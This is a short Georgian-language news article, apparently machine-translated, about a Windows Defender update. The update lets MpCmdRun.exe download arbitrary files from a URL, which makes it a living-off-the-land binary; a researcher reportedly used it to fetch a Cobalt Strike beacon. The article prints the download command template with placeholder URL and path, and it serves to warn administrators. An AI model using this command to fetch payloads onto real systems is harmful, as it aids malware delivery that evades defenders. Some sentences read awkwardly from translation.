Windows Defender ადმინებისთვის საშიშ აპლიკაციად იქცევა

Windows Defender Windows 10 – ში თავდაცვის პირველი ხაზია მავნე პროგრამების შეტევების შემთხვევაში და ეს ა საკმაოდ კარგი სამუშაოც.

ამასთან, ერთ-ერთ ახალ განახლებაში, ანტივირუსულმა პროგრამამ მიიღო ახალი ბრძანება DownloadFile, რომელიც საშუალებას მისცემს ნებისმიერს, გადმოწერონ ნებისმიერი ფაილი URL– დან თქვენს კომპიუტერში გარკვეულ გზაზე.

ამას შეგვიძლია ვუწოდოთ ექსპლოიტი, რადგან ის შეიძლება გამოყენებულ იქნას მავნე პროგრამების ჩამოსატვირთად, რაც აღმოაჩინა უსაფრთხოების მკვლევარმა მუჰამედ ასკარმა, რომელიც გამოქვეყნდა მისი აღმოჩენა Twitter- ზე.

როგორ შეიძლება Windows Defender გამოვიყენოთ მავნე პროგრამების ჩამოსატვირთად?

მართლაც მარტივია გამოიყენოთ Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) ნებისმიერი ფაილის გარე წყაროდან თქვენს კომპიუტერში გადმოსაწერად.

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

თავის ცდაში, ასკარ შეძლო Cobalt Strike შუქურის ჩამოტვირთვა, რომელიც თავდასხმის კარგად ცნობილი ინსტრუმენტია ამ ბრძანების გამოყენებით.

ახალი ბრძანება შედის ვერსიაში 4.18.2007.8-0 და ზემოთ, რაც თავდამსხმელებს საკმაოდ კარგ დასაწყისს აძლევს.

ძირითადად, ეს თვისება იქცევა ვინდოუსის დამცველი შევიდა LOLBIN (მცხოვრები ხაზის ორობიდან), უვნებელი სისტემის ფაილი, რომელიც შეიძლება გამოყენებულ იქნას მავნე მიზნებისთვის.

საბედნიეროდ, მავნე ფაილის ჩამოტვირთვის შემდეგ, იგი დაფიქსირდება იმავე Windows Defender- ის ან სხვის მიერ ანტივირუსული პროგრამა თუ იმყოფება.

საიმედო დამცავი პროგრამიდან Windows Defender გადაიქცა კიდევ ერთ შესაძლო საფრთხედ, რომლის დაცვაც ადმინისტრატორებისა და უსაფრთხოების ექსპერტების მიერ უნდა მოხდეს.

თუ თქვენ გაქვთ რაიმე წინადადება ან კომენტარი, გთხოვთ, დატოვოთ ქვემოთ კომენტარების განყოფილებაში.